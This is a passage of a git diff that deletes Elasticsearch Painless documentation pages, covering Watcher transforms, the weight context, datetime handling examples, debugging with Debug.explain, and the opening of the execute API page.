t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()) - ] - """ - }, - "actions" : { - "my_log" : { - "logging" : { - "text" : "The output of the payload was transformed to {{ctx.payload}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -<1> The Java Stream API is used in the transform. This API allows manipulation of -the elements of the list in a pipeline. -<2> The stream filter removes items that do not meet the filter criteria. -<3> The stream map transforms each element into a new object. -<4> The collector reduces the stream to a `java.util.List`. -<5> This is done again for the second set of values in the transform. - -The following action transform changes each value in the mod_log action into a `String`. -This transform does not change the values in the unmod_log action. - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "actions" : { - "mod_log" : { - "transform": { <1> - "script" : - """ - def formatter = NumberFormat.getCurrencyInstance(); - return [ - 'msg': ctx.payload.aggregations.theatres.buckets.stream() - .map(t-> formatter.format(t.money.value) + ' for the play ' + t.key) - .collect(Collectors.joining(", ")) - ] - """ - }, - "logging" : { - "text" : "The output of the payload was transformed to: {{ctx.payload.msg}}" - } - }, - "unmod_log" : { <2> - "logging" : { - "text" : "The output of the payload was not transformed and this value should not exist: {{ctx.payload.msg}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -This example uses the streaming API in a very similar manner. The differences below are -subtle and worth calling out. - -<1> The location of the transform is no longer at the top level, but is within -an individual action. -<2> A second action that does not transform the payload is given for reference. - -The following example shows scripted watch and action transforms within the -context of a complete watch. This watch also uses a scripted -<>. - -include::painless-watcher-context-example.asciidoc[] diff --git a/docs/painless/painless-contexts/painless-weight-context.asciidoc b/docs/painless/painless-contexts/painless-weight-context.asciidoc deleted file mode 100644 index 9b4a47bc113..00000000000 --- a/docs/painless/painless-contexts/painless-weight-context.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[painless-weight-context]] -=== Weight context - -Use a Painless script to create a -{ref}/index-modules-similarity.html[weight] for use in a -<>. The weight makes up the -part of the similarity calculation that is independent of the document being -scored, and so can be built up front and cached. - -Queries that contain multiple terms calculate a separate weight for each term. - -*Variables* - -`query.boost` (`float`, read-only):: - The boost value if provided by the query. If this is not provided the - value is `1.0f`. - -`field.docCount` (`long`, read-only):: - The number of documents that have a value for the current field. - -`field.sumDocFreq` (`long`, read-only):: - The sum of all terms that exist for the current field. If this is not - available the value is `-1`. - -`field.sumTotalTermFreq` (`long`, read-only):: - The sum of occurrences in the index for all the terms that exist in the - current field. If this is not available the value is `-1`. - -`term.docFreq` (`long`, read-only):: - The number of documents that contain the current term in the index. - -`term.totalTermFreq` (`long`, read-only):: - The total occurrences of the current term in the index. - -*Return* - -`double`:: - A scoring factor used across all documents. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-guide.asciidoc b/docs/painless/painless-guide.asciidoc deleted file mode 100644 index 2d79445915c..00000000000 --- a/docs/painless/painless-guide.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[painless-guide]] -== Painless Guide - -_Painless_ is a simple, secure scripting language designed specifically for use -with Elasticsearch. It is the default scripting language for Elasticsearch and -can safely be used for inline and stored scripts. For a jump start into -Painless, see <>. For a -detailed description of the Painless syntax and language features, see the -<>. - -You can use Painless anywhere scripts are used in Elasticsearch. Painless -provides: - -* Fast performance: Painless scripts https://benchmarks.elastic.co/index.html#search_qps_scripts[ -run several times faster] than the alternatives. - -* Safety: Fine-grained allowlist with method call/field granularity. See the -{painless}/painless-api-reference.html[Painless API Reference] for a -complete list of available classes and methods. - -* Optional typing: Variables and parameters can use explicit types or the -dynamic `def` type. - -* Syntax: Extends a subset of Java's syntax to provide additional scripting -language features. - -* Optimizations: Designed specifically for Elasticsearch scripting. - -include::painless-guide/index.asciidoc[] \ No newline at end of file diff --git a/docs/painless/painless-guide/index.asciidoc b/docs/painless/painless-guide/index.asciidoc deleted file mode 100644 index f7e5de693df..00000000000 --- a/docs/painless/painless-guide/index.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -include::painless-walkthrough.asciidoc[] - -include::painless-datetime.asciidoc[] - -include::painless-method-dispatch.asciidoc[] - -include::painless-debugging.asciidoc[] - -include::painless-execute-script.asciidoc[] - -include::../redirects.asciidoc[] diff --git a/docs/painless/painless-guide/painless-datetime.asciidoc b/docs/painless/painless-guide/painless-datetime.asciidoc deleted file mode 100644 index 8244ecb9cfd..00000000000 --- a/docs/painless/painless-guide/painless-datetime.asciidoc +++ /dev/null @@ -1,898 +0,0 @@ -[[painless-datetime]] -=== Using Datetime in Painless - -==== Datetime API - -Datetimes in Painless use the standard Java libraries and are available through -the Painless <>. Most of the classes -from the following Java packages are available to use in Painless scripts: - -* <> -* <> -* <> -* <> -* <> - -==== Datetime Representation - -Datetimes in Painless are most commonly represented as a numeric value, a -string value, or a complex value. - -numeric:: a datetime representation as a number from a starting offset called -an epoch; in Painless this is typically a <> as -milliseconds since an epoch of 1970-01-01 00:00:00 Zulu Time -string:: a datetime representation as a sequence of characters defined by -a standard format or a custom format; in Painless this is typically a -<> of the standard format -{wikipedia}/ISO_8601[ISO 8601] -complex:: a datetime representation as a complex type -(<>) that abstracts away internal details of how the -datetime is stored and often provides utilities for modification and -comparison; in Painless this is typically a -<> - -Switching between different representations of datetimes is often necessary to -achieve a script's objective(s). A typical pattern in a script is to switch a -numeric or string datetime to a complex datetime, modify or compare the complex -datetime, and then switch it back to a numeric or string datetime for storage -or to return a result. - -==== Datetime Parsing and Formatting - -Datetime parsing is a switch from a string datetime to a complex datetime, and -datetime formatting is a switch from a complex datetime to a string datetime. - -A <> is a -complex type (<>) that defines the allowed sequence -of characters for a string datetime. Datetime parsing and formatting often -require a DateTimeFormatter. For more information about how to use a -DateTimeFormatter see the -{java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html[Java documentation]. - -===== Datetime Parsing Examples - -* parse from milliseconds -+ -[source,Painless] ----- -String milliSinceEpochString = "434931330000"; -long milliSinceEpoch = Long.parseLong(milliSinceEpochString); -Instant instant = Instant.ofEpochMilli(milliSinceEpoch); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -+ -* parse from ISO 8601 -+ -[source,Painless] ----- -String datetime = '1983-10-13T22:15:30Z'; -ZonedDateTime zdt = ZonedDateTime.parse(datetime); <1> ----- -<1> Note the parse method uses ISO 8601 by default. -+ -* parse from RFC 1123 -+ -[source,Painless] ----- -String datetime = 'Thu, 13 Oct 1983 22:15:30 GMT'; -ZonedDateTime zdt = ZonedDateTime.parse(datetime, - DateTimeFormatter.RFC_1123_DATE_TIME); <1> ----- -<1> Note the use of a built-in DateTimeFormatter. -+ -* parse from a custom format -+ -[source,Painless] ----- -String datetime = 'custom y 1983 m 10 d 13 22:15:30 Z'; -DateTimeFormatter dtf = DateTimeFormatter.ofPattern( - "'custom' 'y' yyyy 'm' MM 'd' dd HH:mm:ss VV"); -ZonedDateTime zdt = ZonedDateTime.parse(datetime, dtf); <1> ----- -<1> Note the use of a custom DateTimeFormatter. - -===== Datetime Formatting Examples - -* format to ISO 8601 -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -String datetime = zdt.format(DateTimeFormatter.ISO_INSTANT); <1> ----- -<1> Note the use of a built-in DateTimeFormatter. -+ -* format to a custom format -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -DateTimeFormatter dtf = DateTimeFormatter.ofPattern( - "'date:' yyyy/MM/dd 'time:' HH:mm:ss"); -String datetime = zdt.format(dtf); <1> ----- -<1> Note the use of a custom DateTimeFormatter. - -==== Datetime Conversion - -Datetime conversion is a switch from a numeric datetime to a complex datetime -and vice versa. - -===== Datetime Conversion Examples - -* convert from milliseconds -+ -[source,Painless] ----- -long milliSinceEpoch = 434931330000L; -Instant instant = Instant.ofEpochMilli(milliSinceEpoch); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -+ -* convert to milliseconds -+ -[source,Painless] ------ -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -long milliSinceEpoch = zdt.toInstant().toEpochMilli(); ------ - -==== Datetime Pieces - -Datetime representations often contain the data to extract individual datetime -pieces such as year, hour, timezone, etc. Use individual pieces of a datetime -to create a complex datetime, and use a complex datetime to extract individual -pieces. - -===== Datetime Pieces Examples - -* create a complex datetime from pieces -+ -[source,Painless] ----- -int year = 1983; -int month = 10; -int day = 13; -int hour = 22; -int minutes = 15; -int seconds = 30; -int nanos = 0; -ZonedDateTime zdt = ZonedDateTime.of( - year, month, day, hour, minutes, seconds, nanos, ZoneId.of('Z')); ----- -+ -* extract pieces from a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 100, ZoneId.of(tz)); -int year = zdt.getYear(); -int month = zdt.getMonthValue(); -int day = zdt.getDayOfMonth(); -int hour = zdt.getHour(); -int minutes = zdt.getMinute(); -int seconds = zdt.getSecond(); -int nanos = zdt.getNano(); ----- - -==== Datetime Modification - -Use either a numeric datetime or a complex datetime to do modification such as -adding several seconds to a datetime or subtracting several days from a -datetime. Use standard <> to -modify a numeric datetime. Use -<> (or fields) to modify -a complex datetime. Note many complex datetimes are immutable so upon -modification a new complex datetime is created that requires -<> or immediate use. - -===== Datetime Modification Examples - -* Subtract three seconds from a numeric datetime in milliseconds -+ -[source,Painless] ----- -long milliSinceEpoch = 434931330000L; -milliSinceEpoch = milliSinceEpoch - 1000L*3L; ----- -+ -* Add three days to a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime updatedZdt = zdt.plusDays(3); ----- -+ -* Subtract 125 minutes from a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime updatedZdt = zdt.minusMinutes(125); ----- -+ -* Set the year on a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime updatedZdt = zdt.withYear(1976); ----- - -==== Datetime Difference (Elapsed Time) - -Use either two numeric datetimes or two complex datetimes to calculate the -difference (elapsed time) between two different datetimes. Use -<> to calculate the difference between two -numeric datetimes of the same time unit such as milliseconds. For -complex datetimes there is often a method or another complex type -(<>) available to calculate the difference. Use -<> -to calculate the difference between two complex datetimes if supported. - -===== Datetime Difference Examples - -* Difference in milliseconds between two numeric datetimes -+ -[source,Painless] ----- -long startTimestamp = 434931327000L; -long endTimestamp = 434931330000L; -long differenceInMillis = endTimestamp - startTimestamp; ----- -+ -* Difference in milliseconds between two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 11000000, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 35, 0, ZoneId.of('Z')); -long differenceInMillis = ChronoUnit.MILLIS.between(zdt1, zdt2); ----- -+ -* Difference in days between two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 11000000, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 17, 22, 15, 35, 0, ZoneId.of('Z')); -long differenceInDays = ChronoUnit.DAYS.between(zdt1, zdt2); ----- - -==== Datetime Comparison - -Use either two numeric datetimes or two complex datetimes to do a datetime -comparison. Use standard <> -to compare two numeric datetimes of the same time unit such as milliseconds. -For complex datetimes there is often a method or another complex type -(<>) available to do the comparison. - -===== Datetime Comparison Examples - -* Greater than comparison of two numeric datetimes in milliseconds -+ -[source,Painless] ----- -long timestamp1 = 434931327000L; -long timestamp2 = 434931330000L; - -if (timestamp1 > timestamp2) { - // handle condition -} ----- -+ -* Equality comparison of two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); - -if (zdt1.equals(zdt2)) { - // handle condition -} ----- -+ -* Less than comparison of two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 17, 22, 15, 35, 0, ZoneId.of('Z')); - -if (zdt1.isBefore(zdt2)) { - // handle condition -} ----- -+ -* Greater than comparison of two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 17, 22, 15, 35, 0, ZoneId.of('Z')); - -if (zdt1.isAfter(zdt2)) { - // handle condition -} ----- - -==== Datetime Zone - -Both string datetimes and complex datetimes have a timezone with a default of -`UTC`. Numeric datetimes do not have enough explicit information to -have a timezone, so `UTC` is always assumed. Use -<> (or fields) in -conjunction with a <> to change -the timezone for a complex datetime. Parse a string datetime into a complex -datetime to change the timezone, and then format the complex datetime back into -a desired string datetime. Note many complex datetimes are immutable so upon -modification a new complex datetime is created that requires -<> or immediate use. - -===== Datetime Zone Examples - -* Modify the timezone for a complex datetime -+ -[source,Painless] ----- -ZonedDateTime utc = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime pst = utc.withZoneSameInstant(ZoneId.of('America/Los_Angeles')); ----- -+ -* Modify the timezone for a string datetime -+ -[source,Painless] ----- -String gmtString = 'Thu, 13 Oct 1983 22:15:30 GMT'; -ZonedDateTime gmtZdt = ZonedDateTime.parse(gmtString, - DateTimeFormatter.RFC_1123_DATE_TIME); <1> -ZonedDateTime pstZdt = - gmtZdt.withZoneSameInstant(ZoneId.of('America/Los_Angeles')); -String pstString = pstZdt.format(DateTimeFormatter.RFC_1123_DATE_TIME); ----- -<1> Note the use of a built-in DateTimeFormatter. - -==== Datetime Input - -There are several common ways datetimes are used as input for a script -determined by the <>. Typically, datetime -input will be accessed from parameters specified by the user, from an original -source document, or from an indexed document. - -===== Datetime Input From User Parameters - -Use the {ref}/modules-scripting-using.html#_script_parameters[params section] -during script specification to pass in a numeric datetime or string datetime as -a script input. Access to user-defined parameters within a script is dependent -on the Painless context, though, the parameters are most commonly accessible -through an input called `params`. - -*Examples* - -* Parse a numeric datetime from user parameters to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -... -"script": { - ... - "params": { - "input_datetime": 434931327000 - } -} -... ----- -+ -** Script: -+ -[source,Painless] ----- -long inputDateTime = params['input_datetime']; -Instant instant = Instant.ofEpochMilli(inputDateTime); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -+ -* Parse a string datetime from user parameters to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -... -"script": { - ... - "params": { - "input_datetime": "custom y 1983 m 10 d 13 22:15:30 Z" - } -} -... ----- -+ -** Script: -+ -[source,Painless] ----- -String datetime = params['input_datetime']; -DateTimeFormatter dtf = DateTimeFormatter.ofPattern( - "'custom' 'y' yyyy 'm' MM 'd' dd HH:mm:ss VV"); -ZonedDateTime zdt = ZonedDateTime.parse(datetime, dtf); <1> ----- -<1> Note the use of a custom DateTimeFormatter. - -===== Datetime Input From a Source Document - -Use an original {ref}/mapping-source-field.html[source] document as a script -input to access a numeric datetime or string datetime for a specific field -within that document. Access to an original source document within a script is -dependent on the Painless context and is not always available. An original -source document is most commonly accessible through an input called -`ctx['_source']` or `params['_source']`. - -*Examples* - -* Parse a numeric datetime from a sourced document to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -{ - ... - "input_datetime": 434931327000 - ... -} ----- -+ -** Script: -+ -[source,Painless] ----- -long inputDateTime = ctx['_source']['input_datetime']; <1> -Instant instant = Instant.ofEpochMilli(inputDateTime); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -<1> Note access to `_source` is dependent on the Painless context. -+ -* Parse a string datetime from a sourced document to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -{ - ... - "input_datetime": "1983-10-13T22:15:30Z" - ... -} ----- -+ -** Script: -+ -[source,Painless] ----- -String datetime = params['_source']['input_datetime']; <1> -ZonedDateTime zdt = ZonedDateTime.parse(datetime); <2> ----- -<1> Note access to `_source` is dependent on the Painless context. -<2> Note the parse method uses ISO 8601 by default. - -===== Datetime Input From an Indexed Document - -Use an indexed document as a script input to access a complex datetime for a -specific field within that document where the field is mapped as a -{ref}/date.html[standard date] or a {ref}/date_nanos.html[nanosecond date]. -Numeric datetime fields mapped as {ref}/number.html[numeric] and string -datetime fields mapped as {ref}/keyword.html[keyword] are accessible through an -indexed document as well. Access to an indexed document within a script is -dependent on the Painless context and is not always available. An indexed -document is most commonly accessible through an input called `doc`. - -*Examples* - -* Format a complex datetime from an indexed document to a string datetime -+ -** Assumptions: -+ -*** The field `input_datetime` exists in all indexes as part of the query -*** All indexed documents contain the field `input_datetime` -+ -** Mappings: -+ -[source,JSON] ----- -{ - "mappings": { - ... - "properties": { - ... - "input_datetime": { - "type": "date" - } - ... - } - ... - } -} ----- -+ -** Script: -+ -[source,Painless] ----- -ZonedDateTime input = doc['input_datetime'].value; -String output = input.format(DateTimeFormatter.ISO_INSTANT); <1> ----- -<1> Note the use of a built-in DateTimeFormatter. -+ -* Find the difference between two complex datetimes from an indexed document -+ -** Assumptions: -+ -*** The fields `start` and `end` may *not* exist in all indexes as part of the -query -*** The fields `start` and `end` may *not* have values in all indexed documents -+ -** Mappings: -+ -[source,JSON] ----- -{ - "mappings": { - ... - "properties": { - ... - "start": { - "type": "date" - }, - "end": { - "type": "date" - } - ... - } - ... - } -} ----- -+ -** Script: -+ -[source,Painless] ----- -if (doc.containsKey('start') && doc.containsKey('end')) { <1> - - if (doc['start'].size() > 0 && doc['end'].size() > 0) { <2> - - ZonedDateTime start = doc['start'].value; - ZonedDateTime end = doc['end'].value; - long differenceInMillis = ChronoUnit.MILLIS.between(start, end); - - // handle difference in times - } else { - // handle fields without values - } -} else { - // handle index with missing fields -} ----- -<1> When a query's results span multiple indexes, some indexes may not -contain a specific field. Use the `containsKey` method call on the `doc` input -to ensure a field exists as part of the index for the current document. -<2> Some fields within a document may have no values. Use the `size` method -call on a field within the `doc` input to ensure that field has at least one -value for the current document. - -==== Datetime Now - -Under most Painless contexts the current datetime, `now`, is not supported. -There are two primary reasons for this. The first is that scripts are often run once -per document, so each time the script is run a different `now` is returned. The -second is that scripts are often run in a distributed fashion without a way to -appropriately synchronize `now`. Instead, pass in a user-defined parameter with -either a string datetime or numeric datetime for `now`. A numeric datetime is -preferred as there is no need to parse it for comparison. - -===== Datetime Now Examples - -* Use a numeric datetime as `now` -+ -** Assumptions: -+ -*** The field `input_datetime` exists in all indexes as part of the query -*** All indexed documents contain the field `input_datetime` -+ -** Mappings: -+ -[source,JSON] ----- -{ - "mappings": { - ... - "properties": { - ... - "input_datetime": { - "type": "date" - } - ... - } - ... - } -} ----- -+ -** Input: -+ -[source,JSON] ----- -... -"script": { - ... - "params": { - "now": - } -} -... ----- -+ -** Script: -+ -[source,Painless] ----- -long now = params['now']; -ZonedDateTime inputDateTime = doc['input_datetime']; -long millisDateTime = zdt.toInstant().toEpochMilli(); -long elapsedTime = now - millisDateTime; ----- -+ -* Use a string datetime as `now` -+ -** Assumptions: -+ -*** The field `input_datetime` exists in all indexes as part of the query -*** All indexed documents contain the field `input_datetime` -+ -** Mappings: -+ -[source,JSON] ----- -{ - "mappings": { - ... - "properties": { - ... - "input_datetime": { - "type": "date" - } - ... - } - ... - } -} ----- -+ -** Input: -+ -[source,JSON] ----- -... -"script": { - ... - "params": { - "now": "" - } -} -... ----- -+ -** Script: -+ -[source,Painless] ----- -String nowString = params['now']; -ZonedDateTime nowZdt = ZonedDateTime.parse(nowString); <1> -long now = ZonedDateTime.toInstant().toEpochMilli(); -ZonedDateTime inputDateTime = doc['input_datetime']; -long millisDateTime = zdt.toInstant().toEpochMilli(); -long elapsedTime = now - millisDateTime; ----- -<1> Note this parses the same string datetime every time the script runs. Use a -numeric datetime to avoid a significant performance hit. - -==== Datetime Examples in Contexts - -===== Load the Example Data - -Run the following curl commands to load the data necessary for the context -examples into an Elasticsearch cluster: - -. Create {ref}/mapping.html[mappings] for the sample data. -+ -[source,console] ----- -PUT /messages -{ - "mappings": { - "properties": { - "priority": { - "type": "integer" - }, - "datetime": { - "type": "date" - }, - "message": { - "type": "text" - } - } - } -} ----- -+ -. Load the sample data. -+ -[source,console] ----- -POST /_bulk -{ "index" : { "_index" : "messages", "_id" : "1" } } -{ "priority": 1, "datetime": "2019-07-17T12:13:14Z", "message": "m1" } -{ "index" : { "_index" : "messages", "_id" : "2" } } -{ "priority": 1, "datetime": "2019-07-24T01:14:59Z", "message": "m2" } -{ "index" : { "_index" : "messages", "_id" : "3" } } -{ "priority": 2, "datetime": "1983-10-14T00:36:42Z", "message": "m3" } -{ "index" : { "_index" : "messages", "_id" : "4" } } -{ "priority": 3, "datetime": "1983-10-10T02:15:15Z", "message": "m4" } -{ "index" : { "_index" : "messages", "_id" : "5" } } -{ "priority": 3, "datetime": "1983-10-10T17:18:19Z", "message": "m5" } -{ "index" : { "_index" : "messages", "_id" : "6" } } -{ "priority": 1, "datetime": "2019-08-03T17:19:31Z", "message": "m6" } -{ "index" : { "_index" : "messages", "_id" : "7" } } -{ "priority": 3, "datetime": "2019-08-04T17:20:00Z", "message": "m7" } -{ "index" : { "_index" : "messages", "_id" : "8" } } -{ "priority": 2, "datetime": "2019-08-04T18:01:01Z", "message": "m8" } -{ "index" : { "_index" : "messages", "_id" : "9" } } -{ "priority": 3, "datetime": "1983-10-10T19:00:45Z", "message": "m9" } -{ "index" : { "_index" : "messages", "_id" : "10" } } -{ "priority": 2, "datetime": "2019-07-23T23:39:54Z", "message": "m10" } ----- -// TEST[continued] - -===== Day-of-the-Week Bucket Aggregation Example - -The following example uses a -{ref}/search-aggregations-bucket-terms-aggregation.html#search-aggregations-bucket-terms-aggregation-script[terms aggregation] -as part of the -<> to -display the number of messages from each day-of-the-week. - -[source,console] ----- -GET /messages/_search?pretty=true -{ - "aggs": { - "day-of-week-count": { - "terms": { - "script": "return doc[\"datetime\"].value.getDayOfWeekEnum();" - } - } - } -} ----- -// TEST[continued] - -===== Morning/Evening Bucket Aggregation Example - -The following example uses a -{ref}/search-aggregations-bucket-terms-aggregation.html#search-aggregations-bucket-terms-aggregation-script[terms aggregation] -as part of the -<> to -display the number of messages received in the morning versus the evening. - -[source,console] ----- -GET /messages/_search?pretty=true -{ - "aggs": { - "am-pm-count": { - "terms": { - "script": "return doc[\"datetime\"].value.getHour() < 12 ? \"AM\" : \"PM\";" - } - } - } -} ----- -// TEST[continued] - -===== Age of a Message Script Field Example - -The following example uses a -{ref}/search-fields.html#script-fields[script field] as part of the -<> to display the elapsed time between -"now" and when a message was received. - -[source,console] ----- -GET /_search?pretty=true -{ - "query": { - "match_all": {} - }, - "script_fields": { - "message_age": { - "script": { - "source": "ZonedDateTime now = ZonedDateTime.ofInstant(Instant.ofEpochMilli(params[\"now\"]), ZoneId.of(\"Z\")); ZonedDateTime mdt = doc[\"datetime\"].value; String age; long years = mdt.until(now, ChronoUnit.YEARS); age = years + \"Y \"; mdt = mdt.plusYears(years); long months = mdt.until(now, ChronoUnit.MONTHS); age += months + \"M \"; mdt = mdt.plusMonths(months); long days = mdt.until(now, ChronoUnit.DAYS); age += days + \"D \"; mdt = mdt.plusDays(days); long hours = mdt.until(now, ChronoUnit.HOURS); age += hours + \"h \"; mdt = mdt.plusHours(hours); long minutes = mdt.until(now, ChronoUnit.MINUTES); age += minutes + \"m \"; mdt = mdt.plusMinutes(minutes); long seconds = mdt.until(now, ChronoUnit.SECONDS); age += hours + \"s\"; return age;", - "params": { - "now": 1574005645830 - } - } - } - } -} ----- -// TEST[continued] - -The following shows the script broken into multiple lines: - -[source,Painless] ----- -ZonedDateTime now = ZonedDateTime.ofInstant( - Instant.ofEpochMilli(params['now']), ZoneId.of('Z')); <1> -ZonedDateTime mdt = doc['datetime'].value; <2> - -String age; - -long years = mdt.until(now, ChronoUnit.YEARS); <3> -age = years + 'Y '; <4> -mdt = mdt.plusYears(years); <5> - -long months = mdt.until(now, ChronoUnit.MONTHS); -age += months + 'M '; -mdt = mdt.plusMonths(months); - -long days = mdt.until(now, ChronoUnit.DAYS); -age += days + 'D '; -mdt = mdt.plusDays(days); - -long hours = mdt.until(now, ChronoUnit.HOURS); -age += hours + 'h '; -mdt = mdt.plusHours(hours); - -long minutes = mdt.until(now, ChronoUnit.MINUTES); -age += minutes + 'm '; -mdt = mdt.plusMinutes(minutes); - -long seconds = mdt.until(now, ChronoUnit.SECONDS); -age += hours + 's'; - -return age; <6> ----- -<1> Parse the datetime "now" as input from the user-defined params. -<2> Store the datetime the message was received as a `ZonedDateTime`. -<3> Find the difference in years between "now" and the datetime the message was -received. -<4> Add the difference in years later returned in the format -`Y ...` for the age of a message. -<5> Add the years so only the remainder of the months, days, etc. remain as the -difference between "now" and the datetime the message was received. Repeat this -pattern until the desired granularity is reached (seconds in this example). -<6> Return the age of the message in the format -`Y M D h m s `. diff --git a/docs/painless/painless-guide/painless-debugging.asciidoc b/docs/painless/painless-guide/painless-debugging.asciidoc deleted file mode 100644 index afd83705964..00000000000 --- a/docs/painless/painless-guide/painless-debugging.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[[painless-debugging]] -=== Painless Debugging - -==== Debug.Explain - -Painless doesn't have a -{wikipedia}/Read%E2%80%93eval%E2%80%93print_loop[REPL] -and while it'd be nice for it to have one day, it wouldn't tell you the -whole story around debugging painless scripts embedded in Elasticsearch because -the data that the scripts have access to or "context" is so important. For now -the best way to debug embedded scripts is by throwing exceptions at choice -places. While you can throw your own exceptions -(`throw new Exception('whatever')`), Painless's sandbox prevents you from -accessing useful information like the type of an object. So Painless has a -utility method, `Debug.explain` which throws the exception for you. For -example, you can use {ref}/search-explain.html[`_explain`] to explore the -context available to a {ref}/query-dsl-script-query.html[script query]. - -[source,console] ---------------------------------------------------------- -PUT /hockey/_doc/1?refresh -{"first":"johnny","last":"gaudreau","goals":[9,27,1],"assists":[17,46,0],"gp":[26,82,1]} - -POST /hockey/_explain/1 -{ - "query": { - "script": { - "script": "Debug.explain(doc.goals)" - } - } -} ---------------------------------------------------------- -// TEST[s/_explain\/1/_explain\/1?error_trace=false/ catch:/painless_explain_error/] -// The test system sends error_trace=true by default for easier debugging so -// we have to override it to get a normal shaped response - -Which shows that the class of `doc.first` is -`org.elasticsearch.index.fielddata.ScriptDocValues.Longs` by responding with: - -[source,console-result] ---------------------------------------------------------- -{ - "error": { - "type": "script_exception", - "to_string": "[1, 9, 27]", - "painless_class": "org.elasticsearch.index.fielddata.ScriptDocValues.Longs", - "java_class": "org.elasticsearch.index.fielddata.ScriptDocValues$Longs", - ... - }, - "status": 400 -} ---------------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"script_stack": $body.error.script_stack, "script": $body.error.script, "lang": $body.error.lang, "position": $body.error.position, "caused_by": $body.error.caused_by, "root_cause": $body.error.root_cause, "reason": $body.error.reason/] - -You can use the same trick to see that `_source` is a `LinkedHashMap` -in the `_update` API: - -[source,console] ---------------------------------------------------------- -POST /hockey/_update/1 -{ - "script": "Debug.explain(ctx._source)" -} ---------------------------------------------------------- -// TEST[continued s/_update\/1/_update\/1?error_trace=false/ catch:/painless_explain_error/] - -The response looks like: - -[source,console-result] ---------------------------------------------------------- -{ - "error" : { - "root_cause": ..., - "type": "illegal_argument_exception", - "reason": "failed to execute script", - "caused_by": { - "type": "script_exception", - "to_string": "{gp=[26, 82, 1], last=gaudreau, assists=[17, 46, 0], first=johnny, goals=[9, 27, 1]}", - "painless_class": "java.util.LinkedHashMap", - "java_class": "java.util.LinkedHashMap", - ... - } - }, - "status": 400 -} ---------------------------------------------------------- -// TESTRESPONSE[s/"root_cause": \.\.\./"root_cause": $body.error.root_cause/] -// TESTRESPONSE[s/\.\.\./"script_stack": $body.error.caused_by.script_stack, "script": $body.error.caused_by.script, "lang": $body.error.caused_by.lang, "position": $body.error.caused_by.position, "caused_by": $body.error.caused_by.caused_by, "reason": $body.error.caused_by.reason/] -// TESTRESPONSE[s/"to_string": ".+"/"to_string": $body.error.caused_by.to_string/] - -Once you have a class you can go to <> to see a list of -available methods. diff --git a/docs/painless/painless-guide/painless-execute-script.asciidoc b/docs/painless/painless-guide/painless-execute-script.asciidoc deleted file mode 100644 index 6c61d5f6011..00000000000 --- a/docs/painless/painless-guide/painless-execute-script.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[[painless-execute-api]] -=== Painless execute API - -experimental[The painless execute api is new and the request / response format may change in a breaking way in the future] - -The Painless execute API allows an arbitrary script to be executed and a result to be returned. - -[[painless-execute-api-parameters]] -.Parameters -[options="header"] -|====== -| Name | Required | Default | Description -| `script` | yes | - | The script to execute. -| `context` | no | `painless_test` | The context the script should be executed in. 